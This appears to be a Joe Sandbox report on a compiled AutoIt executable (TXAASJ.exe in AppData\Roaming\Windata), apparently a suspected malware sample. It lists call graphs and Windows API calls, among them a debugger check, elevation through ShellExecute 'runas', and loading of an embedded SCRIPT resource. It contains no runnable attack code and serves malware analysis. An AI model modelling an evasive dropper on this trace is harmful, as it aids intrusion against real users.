107138->107142 107143 e7bb98 InitializeCriticalSectionAndSpinCount 107138->107143 107139->107133 107139->107135 107139->107137 107140 e7bcbb InitializeCriticalSectionAndSpinCount 107139->107140 107140->107139 107141->107136 107141->107138 107141->107139 107142->107138 107142->107143 107143->107138 107145 e76b30 107144->107145 107147 e83c3e 107144->107147 107151 e8382b GetModuleFileNameW 107145->107151 107264 e77660 47 API calls __crtCompareStringA_stat 107147->107264 107149 e83c64 _memmove 107150 e83c7a FreeEnvironmentStringsW 107149->107150 107150->107145 107152 e8385f _wparse_cmdline 107151->107152 107153 e76b3a 107152->107153 107154 e83899 107152->107154 107153->107085 107194 e71d7b 47 API calls 3 library calls 107153->107194 107265 e77660 47 API calls __crtCompareStringA_stat 107154->107265 107156 e8389f _wparse_cmdline 107156->107153 107158 e83a7d __NMSG_WRITE 107157->107158 107162 e83a75 107157->107162 107159 e77616 __calloc_crt 47 API calls 107158->107159 107167 e83aa6 __NMSG_WRITE 107159->107167 107160 e83afd 107161 e728ca _free 47 API calls 107160->107161 107161->107162 107162->107088 107163 e77616 __calloc_crt 47 API calls 107163->107167 107164 e83b22 107165 e728ca _free 47 API calls 107164->107165 107165->107162 107167->107160 107167->107162 107167->107163 107167->107164 107168 e83b39 107167->107168 107266 e83317 47 API calls 2 library calls 107167->107266 107267 e77ab0 IsProcessorFeaturePresent 107168->107267 107170 e83b45 107170->107088 107172 e71dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 107171->107172 107174 e71e00 __IsNonwritableInCurrentImage 107172->107174 107290 e71b2a 52 API calls __cinit 107172->107290 107174->107092 107176 ec23b5 107175->107176 107177 e5369c 107175->107177 107178 e536d6 IsThemeActive 107177->107178 107291 e72025 107178->107291 107182 e53702 107303 e532de SystemParametersInfoW SystemParametersInfoW 107182->107303 107184 e5370e 107304 e5374e GetCurrentDirectoryW 107184->107304 107187 e5373b 
107187->107096 108489 e71ee2 107188->108489 107190 e72020 107190->107097 107191->107070 107192->107074 107193->107081 107197->107100 107198->107106 107199->107108 107200->107112 107201->107113 107203 e7761d 107202->107203 107205 e7765a 107203->107205 107206 e7763b Sleep 107203->107206 107211 e83e5a 107203->107211 107205->107117 107208 e78b59 TlsSetValue 107205->107208 107207 e77652 107206->107207 107207->107203 107207->107205 107208->107121 107209->107124 107210->107120 107212 e83e65 107211->107212 107216 e83e80 __calloc_impl 107211->107216 107213 e83e71 107212->107213 107212->107216 107218 e7889e 47 API calls __getptd_noexit 107213->107218 107215 e83e90 RtlAllocateHeap 107215->107216 107217 e83e76 107215->107217 107216->107215 107216->107217 107217->107203 107218->107217 107220 e78995 107219->107220 107221 e789a8 EnterCriticalSection 107219->107221 107227 e78a0c 107220->107227 107221->107128 107223 e7899b 107223->107221 107251 e71d7b 47 API calls 3 library calls 107223->107251 107226->107132 107228 e78a18 __getstream 107227->107228 107229 e78a21 107228->107229 107230 e78a39 107228->107230 107252 e78e52 47 API calls __NMSG_WRITE 107229->107252 107232 e78a37 107230->107232 107238 e78aa1 __getstream 107230->107238 107232->107230 107254 e77660 47 API calls __crtCompareStringA_stat 107232->107254 107233 e78a26 107253 e78eb2 47 API calls 5 library calls 107233->107253 107236 e78a4d 107239 e78a54 107236->107239 107240 e78a63 107236->107240 107237 e78a2d 107243 e71d65 _fast_error_exit 3 API calls 107237->107243 107238->107223 107255 e7889e 47 API calls __getptd_noexit 107239->107255 107242 e78984 __lock 46 API calls 107240->107242 107245 e78a6a 107242->107245 107243->107232 107244 e78a59 107244->107238 107246 e78a8e 107245->107246 107247 e78a79 InitializeCriticalSectionAndSpinCount 107245->107247 107256 e728ca 107246->107256 107248 e78a94 107247->107248 107262 e78aaa LeaveCriticalSection _doexit 107248->107262 107252->107233 107253->107237 107254->107236 107255->107244 
107257 e728d3 RtlFreeHeap 107256->107257 107258 e728fc _free 107256->107258 107257->107258 107259 e728e8 107257->107259 107258->107248 107263 e7889e 47 API calls __getptd_noexit 107259->107263 107261 e728ee GetLastError 107261->107258 107262->107238 107263->107261 107264->107149 107265->107156 107266->107167 107268 e77abb 107267->107268 107273 e77945 107268->107273 107272 e77ad6 107272->107170 107274 e7795f _memset ___raise_securityfailure 107273->107274 107275 e7797f IsDebuggerPresent 107274->107275 107281 e78e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 107275->107281 107278 e77a66 107280 e78e27 GetCurrentProcess TerminateProcess 107278->107280 107279 e77a43 ___raise_securityfailure 107282 e7b4bf 107279->107282 107280->107272 107281->107279 107283 e7b4c7 107282->107283 107284 e7b4c9 IsProcessorFeaturePresent 107282->107284 107283->107278 107286 e84560 107284->107286 107289 e8450f 5 API calls ___raise_securityfailure 107286->107289 107288 e84643 107288->107278 107289->107288 107290->107174 107292 e78984 __lock 47 API calls 107291->107292 107293 e72030 107292->107293 107349 e78ae8 LeaveCriticalSection 107293->107349 107295 e536fb 107296 e7208d 107295->107296 107297 e720b1 107296->107297 107298 e72097 107296->107298 107297->107182 107298->107297 107350 e7889e 47 API calls __getptd_noexit 107298->107350 107300 e720a1 107351 e77aa0 8 API calls __wcsnicmp 107300->107351 107302 e720ac 107302->107182 107303->107184 107352 e54257 107304->107352 107306 e5377f IsDebuggerPresent 107307 e5378d 107306->107307 107308 ec21b7 MessageBoxA 107306->107308 107309 e53852 107307->107309 107310 ec21d0 107307->107310 107311 e537aa 107307->107311 107308->107310 107312 e53859 SetCurrentDirectoryW 107309->107312 107512 e92f5b 48 API calls 107310->107512 107416 e53bff 107311->107416 107315 e53716 SystemParametersInfoW 107312->107315 107315->107187 107316 ec21e0 107321 ec21f6 SetCurrentDirectoryW 107316->107321 107318 e537c8 GetFullPathNameW 107428 e534f3 107318->107428 
107321->107315 107322 e5380f 107323 e53818 107322->107323 107513 e8be31 AllocateAndInitializeSid CheckTokenMembership FreeSid 107322->107513 107443 e530a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 107323->107443 107326 ec2213 107326->107323 107329 ec2224 GetModuleFileNameW 107326->107329 107514 e5caee 107329->107514 107330 e53837 107451 e5e1f0 107330->107451 107331 e53822 107331->107330 107510 e53598 67 API calls _memset 107331->107510 107337 ec224c 107518 e539e8 48 API calls 2 library calls 107337->107518 107338 ec2271 107521 e539e8 48 API calls 2 library calls 107338->107521 107341 ec2257 107519 e539e8 48 API calls 2 library calls 107341->107519 107343 ec226d GetForegroundWindow ShellExecuteW 107347 ec22a5 Mailbox 107343->107347 107346 ec2264 107520 e539e8 48 API calls 2 library calls 107346->107520 107347->107309 107349->107295 107350->107300 107351->107302 107522 e53c70 107352->107522 107356 e54278 GetModuleFileNameW 107539 e534c1 107356->107539 107361 e5caee 48 API calls 107362 e542ba 107361->107362 107554 e5d380 107362->107554 107364 e542ca Mailbox 107365 e5caee 48 API calls 107364->107365 107366 e542f2 107365->107366 107367 e5d380 55 API calls 107366->107367 107368 e54305 Mailbox 107367->107368 107369 e5caee 48 API calls 107368->107369 107370 e54316 107369->107370 107558 e5d2d2 107370->107558 107372 e54328 Mailbox 107373 e5d3d2 48 API calls 107372->107373 107374 e5433b 107373->107374 107564 e54477 107374->107564 107378 e54355 107379 e5435f 107378->107379 107380 ec20f7 107378->107380 107382 e71bc7 _W_store_winword 59 API calls 107379->107382 107381 e54477 48 API calls 107380->107381 107383 ec210b 107381->107383 107384 e5436a 107382->107384 107386 e54477 48 API calls 107383->107386 107384->107383 107385 e54374 107384->107385 107387 e71bc7 _W_store_winword 59 API calls 107385->107387 107388 ec2127 107386->107388 107389 e5437f 107387->107389 107390 ec212f GetModuleFileNameW 107388->107390 107389->107390 107391 e54389 107389->107391 107393 e54477 
48 API calls 107390->107393 107392 e71bc7 _W_store_winword 59 API calls 107391->107392 107394 e54394 107392->107394 107395 ec2160 107393->107395 107396 e543d6 107394->107396 107401 e54477 48 API calls 107394->107401 107404 ec2185 _wcscpy 107394->107404 107608 e5c935 107395->107608 107398 e543e7 107396->107398 107396->107404 107580 e53320 107398->107580 107400 e54477 48 API calls 107402 ec217d 107400->107402 107403 e543b8 _wcscpy 107401->107403 107402->107404 107410 e54477 48 API calls 107403->107410 107406 e54477 48 API calls 107404->107406 107409 ec21ab 107406->107409 107407 e543ff 107591 e614a0 107407->107591 107409->107409 107410->107396 107411 e614a0 48 API calls 107413 e5440f 107411->107413 107413->107411 107414 e54477 48 API calls 107413->107414 107415 e54451 Mailbox 107413->107415 107607 e57bef 48 API calls 107413->107607 107414->107413 107415->107306 107417 ec3ce4 _memset 107416->107417 107418 e53c1f 107416->107418 107420 ec3cf6 GetOpenFileNameW 107417->107420 108079 e531b8 107418->108079 107420->107418 107422 e537c0 107420->107422 107421 e53c28 108086 e53a67 SHGetMalloc 107421->108086 107422->107309 107422->107318 107424 e53c31 108091 e53b45 GetFullPathNameW 107424->108091 108174 e5a716 107428->108174 107430 e53501 107431 e53575 107430->107431 108185 e521dd 86 API calls 107430->108185 107431->107316 107431->107322 107433 e5350a 107433->107431 108186 e55460 88 API calls Mailbox 107433->108186 107435 e53513 107435->107431 107436 e53517 GetFullPathNameW 107435->107436 107437 e57e53 48 API calls 107436->107437 107438 e53541 107437->107438 107439 e57e53 48 API calls 107438->107439 107440 e5354e 107439->107440 107441 ec66b4 _wcscat 107440->107441 107442 e57e53 48 API calls 107440->107442 107442->107431 107444 e5310f 107443->107444 107445 ec21b0 107443->107445 108189 e5318a 107444->108189 107449 e53185 107450 e52e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 107449->107450 107450->107331 107452 e5e216 107451->107452 107509 e5e226 Mailbox 107451->107509 
107453 e5e670 107452->107453 107452->107509 108225 e6ecee 255 API calls 107453->108225 107455 e53842 107455->107309 107511 e52b94 Shell_NotifyIconW _memset 107455->107511 107458 e5e26c PeekMessageW 107458->107509 107460 e5e695 LockWindowUpdate DestroyWindow GetMessageW 107460->107455 107463 e5e6c7 107460->107463 107461 ec5b13 Sleep 107461->107509 107465 ec62a7 TranslateMessage DispatchMessageW GetMessageW 107463->107465 107464 e5e4e7 107464->107455 108201 e5322e 107464->108201 107465->107455 107465->107465 107467 e6cf79 49 API calls 107467->107509 107468 e5e657 PeekMessageW 107468->107509 107469 e5e517 timeGetTime 107469->107509 107471 e7010a 48 API calls 107471->107509 107472 e5c935 48 API calls 107472->107509 107473 e5e641 TranslateMessage DispatchMessageW 107473->107468 107474 ec5dfc WaitForSingleObject 107476 ec5e19 GetExitCodeProcess CloseHandle 107474->107476 107474->107509 107475 ec6147 Sleep 107501 ec5cce Mailbox 107475->107501 107476->107509 107477 e5d3d2 48 API calls 107477->107501 107478 e5e6cc timeGetTime 108226 e6cf79 49 API calls 107478->108226 107479 ec5feb Sleep 107479->107501 107483 ec61de GetExitCodeProcess 107487 ec620a CloseHandle 107483->107487 107488 ec61f4 WaitForSingleObject 107483->107488 107485 e51000 231 API calls 107485->107509 107486 e6e3a5 timeGetTime 107486->107501 107487->107501 107488->107487 107488->107509 107489 ec5cea Sleep 107489->107509 107490 ec5cd7 Sleep 107490->107489 107491 eb8a48 108 API calls 107491->107501 107492 e51dce 107 API calls 107492->107501 107494 ec6266 Sleep 107494->107509 107495 e5caee 48 API calls 107495->107501 107499 e5d380 55 API calls 107499->107501 107501->107477 107501->107483 107501->107486 107501->107489 107501->107490 107501->107491 107501->107492 107501->107494 107501->107495 107501->107499 107501->107509 108228 e956dc 49 API calls Mailbox 107501->108228 108229 e6cf79 49 API calls 107501->108229 108230 e51000 255 API calls 107501->108230 108270 ead12a 50 API calls 107501->108270 108271 e98355 
QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 107501->108271 108272 e96f5b 63 API calls 3 library calls 107501->108272 107506 e5d380 55 API calls 107506->107509 107507 e9d520 86 API calls 107507->107509 107508 e5caee 48 API calls 107508->107509 107509->107458 107509->107461 107509->107464 107509->107467 107509->107468 107509->107469 107509->107471 107509->107472 107509->107473 107509->107474 107509->107475 107509->107478 107509->107479 107509->107485 107509->107489 107509->107501 107509->107506 107509->107507 107509->107508 108194 e5e7e0 107509->108194 108219 e5e7b0 255 API calls Mailbox 107509->108219 108220 e5ea00 255 API calls 2 library calls 107509->108220 108221 e644e0 255 API calls Mailbox 107509->108221 108222 e63680 255 API calls 2 library calls 107509->108222 108223 e6f381 TranslateAcceleratorW 107509->108223 108224 e6ed1a IsDialogMessageW GetClassLongW 107509->108224 108227 eb8b20 48 API calls 107509->108227 108231 e5fa40 107509->108231 107510->107330 107511->107309 107512->107316 107513->107326 107515 e5cafd __NMSG_WRITE _memmove 107514->107515 107516 e7010a 48 API calls 107515->107516 107517 e5cb3b 107516->107517 107517->107337 107517->107338 107518->107341 107519->107346 107520->107343 107521->107343 107523 e5d3d2 48 API calls 107522->107523 107524 e53c80 107523->107524 107525 e5a359 107524->107525 107526 e5a366 __ftell_nolock 107525->107526 107527 e57e53 48 API calls 107526->107527 107533 e5a4cc Mailbox 107526->107533 107529 e5a398 107527->107529 107538 e5a3ce Mailbox 107529->107538 107612 e5a4f6 107529->107612 107530 e5a4f6 48 API calls 107530->107538 107531 e5a49f 107532 e5caee 48 API calls 107531->107532 107531->107533 107535 e5a4c0 107532->107535 107533->107356 107534 e5caee 48 API calls 107534->107538 107616 e55b47 48 API calls _memmove 107535->107616 107538->107530 107538->107531 107538->107533 107538->107534 107615 e55b47 48 API calls _memmove 107538->107615 107617 e53f9b 107539->107617 107542 e534ea 
107551 e58182 107542->107551 107546 e728ca _free 47 API calls 107548 ec34d0 107546->107548 107547 ec34c3 107547->107546 107549 e53e39 84 API calls 107548->107549 107550 ec34d9 107549->107550 107550->107550 107552 e7010a 48 API calls 107551->107552 107553 e542ad 107552->107553 107553->107361 107555 e5d38b 107554->107555 107556 e5d3b4 107555->107556 108068 e5d772 55 API calls 107555->108068 107556->107364 107559 e5d30a 107558->107559 107560 e5d2df 107558->107560 107559->107372 107563 e5d2e6 107560->107563 108070 e5d349 53 API calls 107560->108070 107563->107559 108069 e5d349 53 API calls 107563->108069 107565 e54481 107564->107565 107566 e5449a 107564->107566 107567 e5c935 48 API calls 107565->107567 107568 e57e53 48 API calls 107566->107568 107569 e54347 107567->107569 107568->107569 107570 e71bc7 107569->107570 107571 e71bd3 107570->107571 107572 e71c48 107570->107572 107579 e71bf8 107571->107579 108071 e7889e 47 API calls __getptd_noexit 107571->108071 108073 e71c5a 59 API calls 4 library calls 107572->108073 107575 e71c55 107575->107378 107576 e71bdf 108072 e77aa0 8 API calls __wcsnicmp 107576->108072 107578 e71bea 107578->107378 107579->107378 107581 e53334 107580->107581 107583 e53339 Mailbox 107580->107583 108074 e5342c 48 API calls 107581->108074 107588 e53347 107583->107588 108075 e5346e 48 API calls 107583->108075 107585 e7010a 48 API calls 107587 e533d8 107585->107587 107586 e53422 107586->107407 107589 e7010a 48 API calls 107587->107589 107588->107585 107588->107586 107590 e533e3 107589->107590 107590->107407 107590->107590 107592 e61606 107591->107592 107593 e614b2 107591->107593 107592->107413 107595 e7010a 48 API calls 107593->107595 107606 e614be 107593->107606 107596 ec5299 107595->107596 107598 e7010a 48 API calls 107596->107598 107597 e6156d 107597->107413 107605 ec52a4 107598->107605 107599 e614c9 107599->107597 107600 e7010a 48 API calls 107599->107600 107601 e615af 107600->107601 107602 e615c2 107601->107602 108076 e6d6b4 48 API calls 
107601->108076 107602->107413 107604 e7010a 48 API calls 107604->107605 107605->107604 107605->107606 107606->107599 108077 e5346e 48 API calls 107606->108077 107607->107413 107609 e5c940 107608->107609 107610 e5c948 107608->107610 108078 e5d805 48 API calls _memmove 107609->108078 107610->107400 107613 e5b8a7 48 API calls 107612->107613 107614 e5a501 107613->107614 107614->107529 107615->107538 107616->107533 107682 e53f5d 107617->107682 107622 e53fc6 LoadLibraryExW 107692 e53e78 107622->107692 107623 ec5830 107625 e53e39 84 API calls 107623->107625 107627 ec5837 107625->107627 107629 e53e78 3 API calls 107627->107629 107631 ec583f 107629->107631 107630 e53fed 107630->107631 107632 e53ff9 107630->107632 107718 e5417d 107631->107718 107634 e53e39 84 API calls 107632->107634 107636 e534e2 107634->107636 107636->107542 107641 e9cc82 107636->107641 107638 ec5866 107726 e541cb 107638->107726 107640 ec5873 107642 e541a7 83 API calls 107641->107642 107643 e9ccf1 107642->107643 107904 e9ce59 107643->107904 107646 e5417d 64 API calls 107647 e9cd1e 107646->107647 107648 e5417d 64 API calls 107647->107648 107649 e9cd2e 107648->107649 107650 e5417d 64 API calls 107649->107650 107651 e9cd49 107650->107651 107652 e5417d 64 API calls 107651->107652 107653 e9cd64 107652->107653 107654 e541a7 83 API calls 107653->107654 107655 e9cd7b 107654->107655 107656 e745ec __crtCompareStringA_stat 47 API calls 107655->107656 107657 e9cd82 107656->107657 107658 e745ec __crtCompareStringA_stat 47 API calls 107657->107658 107659 e9cd8c 107658->107659 107660 e5417d 64 API calls 107659->107660 107661 e9cda0 107660->107661 107662 e9c846 GetSystemTimeAsFileTime 107661->107662 107663 e9cdb3 107662->107663 107664 e9cdc8 107663->107664 107665 e9cddd 107663->107665 107668 e728ca _free 47 API calls 107664->107668 107666 e9cde3 107665->107666 107667 e9ce42 107665->107667 107910 e9c251 107666->107910 107671 e728ca _free 47 API calls 107667->107671 107669 e9cdce 107668->107669 107672 e728ca _free 47 API 
calls 107669->107672 107674 e9cd07 107671->107674 107672->107674 107674->107547 107676 e53e39 107674->107676 107675 e728ca _free 47 API calls 107675->107674 107677 e53e43 107676->107677 107678 e53e4a 107676->107678 107679 e74274 __fcloseall 83 API calls 107677->107679 107680 e53e59 107678->107680 107681 e53e6a FreeLibrary 107678->107681 107679->107678 107680->107547 107681->107680 107731 e53f20 107682->107731 107685 e53f85 107687 e53f96 107685->107687 107688 e53f8d FreeLibrary 107685->107688 107689 e74129 107687->107689 107688->107687 107739 e7413e 107689->107739 107691 e53fba 107691->107622 107691->107623 107818 e53eb3 107692->107818 107695 e53e9f 107697 e53eb1 107695->107697 107698 e53ea8 FreeLibrary 107695->107698 107699 e54010 107697->107699 107698->107697 107700 e7010a 48 API calls 107699->107700 107701 e54025 107700->107701 107702 e54bce 48 API calls 107701->107702 107703 e54031 _memmove 107702->107703 107705 e54161 107703->107705 107706 e54129 107703->107706 107709 e5406c 107703->107709 107704 e541cb 57 API calls 107714 e54075 107704->107714 107837 e9d03f 93 API calls 107705->107837 107826 e531f2 CreateStreamOnHGlobal 107706->107826 107709->107704 107710 e5417d 64 API calls 107710->107714 107712 e54109 107712->107630 107713 ec5794 107715 e541a7 83 API calls 107713->107715 107714->107710 107714->107712 107714->107713 107832 e541a7 107714->107832 107716 ec57a8 107715->107716 107717 e5417d 64 API calls 107716->107717 107717->107712 107719 ec587d 107718->107719 107720 e5418f 107718->107720 107861 e744ae 107720->107861 107723 e9c846 107881 e9c6a0 107723->107881 107725 e9c85c 107725->107638 107727 ec58bf 107726->107727 107728 e541da 107726->107728 107886 e74af5 107728->107886 107730 e541e2 107730->107640 107735 e53f32 107731->107735 107734 e53f08 LoadLibraryA GetProcAddress 107734->107685 107736 e53f28 107735->107736 107737 e53f3b LoadLibraryA 107735->107737 107736->107685 107736->107734 107737->107736 107738 e53f4c GetProcAddress 107737->107738 107738->107736 
107742 e7414a __getstream 107739->107742 107740 e7415d 107787 e7889e 47 API calls __getptd_noexit 107740->107787 107742->107740 107744 e7418e 107742->107744 107743 e74162 107788 e77aa0 8 API calls __wcsnicmp 107743->107788 107758 e7f278 107744->107758 107747 e74193 107748 e7419c 107747->107748 107749 e741a9 107747->107749 107789 e7889e 47 API calls __getptd_noexit 107748->107789 107751 e741d3 107749->107751 107752 e741b3 107749->107752 107772 e7f390 107751->107772 107790 e7889e 47 API calls __getptd_noexit 107752->107790 107753 e7416d @_EH4_CallFilterFunc@8 __getstream 107753->107691 107759 e7f284 __getstream 107758->107759 107760 e78984 __lock 47 API calls 107759->107760 107761 e7f292 107760->107761 107762 e7f309 107761->107762 107767 e78a0c __mtinitlocknum 47 API calls 107761->107767 107770 e7f302 107761->107770 107795 e75ade 48 API calls __lock 107761->107795 107796 e75b48 LeaveCriticalSection LeaveCriticalSection _doexit 107761->107796 107797 e77660 47 API calls __crtCompareStringA_stat 107762->107797 107765 e7f310 107766 e7f31f InitializeCriticalSectionAndSpinCount EnterCriticalSection 107765->107766 107765->107770 107766->107770 107767->107761 107769 e7f37c __getstream 107769->107747 107792 e7f387 107770->107792 107781 e7f3b0 __wopenfile 107772->107781 107773 e7f3ca 107802 e7889e 47 API calls __getptd_noexit 107773->107802 107775 e7f585 107775->107773 107779 e7f5e8 107775->107779 107776 e7f3cf 107803 e77aa0 8 API calls __wcsnicmp 107776->107803 107778 e741de 107791 e74200 LeaveCriticalSection LeaveCriticalSection _fseek 107778->107791 107799 e87179 107779->107799 107781->107773 107781->107775 107804 e7247b 59 API calls 3 library calls 107781->107804 107783 e7f57e 107783->107775 107805 e7247b 59 API calls 3 library calls 107783->107805 107785 e7f59d 107785->107775 107806 e7247b 59 API calls 3 library calls 107785->107806 107787->107743 107788->107753 107789->107753 107790->107753 107791->107753 107798 e78ae8 LeaveCriticalSection 107792->107798 107794 e7f38e 

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00E5376D
                                                                                                                          • Part of subcall function 00E54257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00000104,?,00000000,00000001,00000000), ref: 00E5428C
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?), ref: 00E5377F
                                                                                                                        • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00000104,?,00F11120,C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00F11124,?,?), ref: 00E537EE
                                                                                                                          • Part of subcall function 00E534F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00E5352A
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E53860
                                                                                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00F02934,00000010), ref: 00EC21C5
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00EC21FD
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00EC2232
                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EEDAA4), ref: 00EC2290
                                                                                                                        • ShellExecuteW.SHELL32(00000000), ref: 00EC2297
                                                                                                                          • Part of subcall function 00E530A5: GetSysColorBrush.USER32(0000000F), ref: 00E530B0
                                                                                                                          • Part of subcall function 00E530A5: LoadCursorW.USER32(00000000,00007F00), ref: 00E530BF
                                                                                                                          • Part of subcall function 00E530A5: LoadIconW.USER32(00000063), ref: 00E530D5
                                                                                                                          • Part of subcall function 00E530A5: LoadIconW.USER32(000000A4), ref: 00E530E7
                                                                                                                          • Part of subcall function 00E530A5: LoadIconW.USER32(000000A2), ref: 00E530F9
                                                                                                                          • Part of subcall function 00E530A5: RegisterClassExW.USER32(?), ref: 00E53167
                                                                                                                          • Part of subcall function 00E52E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E52ECB
                                                                                                                          • Part of subcall function 00E52E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E52EEC
                                                                                                                          • Part of subcall function 00E52E9D: ShowWindow.USER32(00000000), ref: 00E52F00
                                                                                                                          • Part of subcall function 00E52E9D: ShowWindow.USER32(00000000), ref: 00E52F09
                                                                                                                          • Part of subcall function 00E53598: _memset.LIBCMT ref: 00E535BE
                                                                                                                          • Part of subcall function 00E53598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E53667
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                        • API String ID: 4253510256-3362726618

                                                                                                                        Control-flow Graph (first block e6e47b-e6e50a; legend: Executed / Not Executed)
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00E6E4A7
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00EEDC28,?,?), ref: 00E6E567
                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,00EEDC28,?,?), ref: 00E6E5BC
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E6E5C7
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E6E5DA
                                                                                                                        • GetSystemInfo.KERNEL32(?,00EEDC28,?,?), ref: 00E6E5E4
                                                                                                                        • GetSystemInfo.KERNEL32(?,00EEDC28,?,?), ref: 00E6E5F0
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2717633055-0

                                                                                                                        Control-flow Graph (first block e531f2-e5320a; legend: Executed / Not Executed)
                                                                                                                        APIs
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E53202
                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00E53219
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00EC57D7
                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00EC57EC
                                                                                                                        • LockResource.KERNEL32(?), ref: 00EC57FF
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                        • String ID: SCRIPT
                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                        APIs
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E5E279
                                                                                                                        • timeGetTime.WINMM ref: 00E5E51A
                                                                                                                        • TranslateMessage.USER32(?), ref: 00E5E646
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00E5E651
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E5E664
                                                                                                                        • LockWindowUpdate.USER32(00000000), ref: 00E5E697
                                                                                                                        • DestroyWindow.USER32 ref: 00E5E6A3
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E5E6BD
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00EC5B15
                                                                                                                        • TranslateMessage.USER32(?), ref: 00EC62AF
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00EC62BD
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EC62D1
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                        • API String ID: 2641332412-570651680
                                                                                                                        APIs
                                                                                                                        • ___createFile.LIBCMT ref: 00E86C73
                                                                                                                        • ___createFile.LIBCMT ref: 00E86CB4
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00E86CDD
                                                                                                                        • __dosmaperr.LIBCMT ref: 00E86CE4
                                                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00E86CF7
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00E86D1A
                                                                                                                        • __dosmaperr.LIBCMT ref: 00E86D23
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00E86D2C
                                                                                                                        • __set_osfhnd.LIBCMT ref: 00E86D5C
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00E86DC6
                                                                                                                        • __close_nolock.LIBCMT ref: 00E86DEC
                                                                                                                        • __chsize_nolock.LIBCMT ref: 00E86E1C
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00E86E2E
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00E86F26
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00E86F3B
                                                                                                                        • __close_nolock.LIBCMT ref: 00E86F9B
                                                                                                                          • Part of subcall function 00E7F84C: CloseHandle.KERNEL32(00000000,00EFEEC4,00000000,?,00E86DF1,00EFEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E7F89C
